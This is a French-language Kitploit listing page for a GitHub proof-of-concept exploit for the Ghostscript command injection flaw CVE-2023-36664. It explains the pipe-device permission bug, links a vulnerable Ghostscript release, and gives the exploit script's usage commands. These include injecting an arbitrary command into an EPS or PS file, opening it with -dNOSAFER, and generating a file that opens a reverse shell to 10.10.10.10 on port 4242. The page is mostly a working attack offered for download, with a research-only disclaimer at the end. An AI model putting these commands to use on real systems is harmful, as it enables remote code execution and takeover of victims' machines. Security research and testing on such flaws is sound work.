Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-36664-Ghostscript-command-injection — PoC de la vulnérabilité d'injection de commandes Ghostscript (CVE-2023-36664) | Kitploit
Outils/GitHubGitHub/jakabakos/cve-2023-36664-ghostscript-command-injection
Génération de PayloadsAnalyse des VulnérabilitésExploitationArticles et RechercheApprentissage et Éducation
GitHubjakabakos/cve-2023-36664-ghostscript-command-injection

CVE-2023-36664-Ghostscript-command-injection

PoC de la vulnérabilité d'injection de commandes Ghostscript (CVE-2023-36664)

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
13016il y a 2 ansVérifié par Kitploit

Preuve de concept de la vulnérabilité d'injection de commandes dans Ghostscript (CVE-2023-36664)

Vulnérabilité divulguée dans Ghostscript antérieur à la version 10.01.2 entraînant l'exécution de code (score CVSS 9.8).

Description officielle de la vulnérabilité :

Artifex Ghostscript jusqu'à la version 10.01.2 gère mal la validation des permissions pour les dispositifs pipe (avec le préfixe %pipe% ou le caractère pipe |).

Debian a publié un avis de sécurité mentionnant une possible exécution de commandes arbitraires :

"Il a été découvert que Ghostscript, l'interpréteur GPL PostScript/PDF, ne gère pas correctement la validation des permissions pour les dispositifs pipe, ce qui pourrait entraîner l'exécution de commandes arbitraires si des fichiers de documents malformés sont traités."

Ce dépôt est créé pour un article de blog d'analyse CVE disponible sur le blog vsociety.

Exploitation

Téléchargez Ghostscript 10.01.1 ici : https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/tag/gs10011 Lien direct vers l'exécutable Windows x64 : https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10011/gs10011w64.exe

L'exploitation peut se produire lors de l'ouverture d'un fichier PS ou EPS et peut permettre l'exécution de code en raison de la mauvaise gestion de la validation des permissions pour les dispositifs pipe par Ghostscript.

Utilisation : python3 CVE_2023_36664_exploit.py <input_file> <command>

Exemple :

root@kitploit:~
python3 CVE_2023_36664_exploit.py file.eps "calc"

Cela génère un nouveau fichier appelé file_injected.eps.

Ouvrez ce fichier avec Ghostscript pour déclencher la calculatrice (depuis la version 9.50, vous devez également utiliser l'option -dNOSAFER) :

root@kitploit:~
gs10011w64.exe -dNOSAFER .\file_injected.eps
preuve

Autres exemples : Générer un nouveau fichier EPS appelé run_calculator.eps avec la charge utile "calc" (ouvre une nouvelle calculatrice sur Windows)

root@kitploit:~
python3 CVE_2023_36664_exploit.py --generate --payload calc --filename run_calculator --extension eps

Générer un nouveau fichier EPS appelé rev_shell.eps avec une IP personnalisée (démarre un reverse shell lorsqu'il est déclenché sur Unix)

root@kitploit:~
python3 CVE_2023_36664_exploit.py --generate --revshell -ip 10.10.10.10 -port 4242 --filename trigger_revshell --extension eps

Générer un nouveau fichier PS appelé malicius.ps avec la charge utile "calc" (ouvre une nouvelle calculatrice sur Windows)

root@kitploit:~
python3 CVE_2023_36664_exploit.py -g -p "calc" -x ps

Injecter une charge utile personnalisée malveillante ("calc") dans un fichier existant appelé file.eps (ouvre une nouvelle calculatrice sur Windows)

root@kitploit:~
python3 CVE_2023_36664_exploit.py --inject --payload "calc" --filename file.eps

Avertissement

Ce logiciel a été créé purement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes sauf autorisation explicite. Les responsables du projet ne sont pas responsables de l'utilisation abusive du logiciel. Utilisez-le de manière responsable.

Télécharger l’outil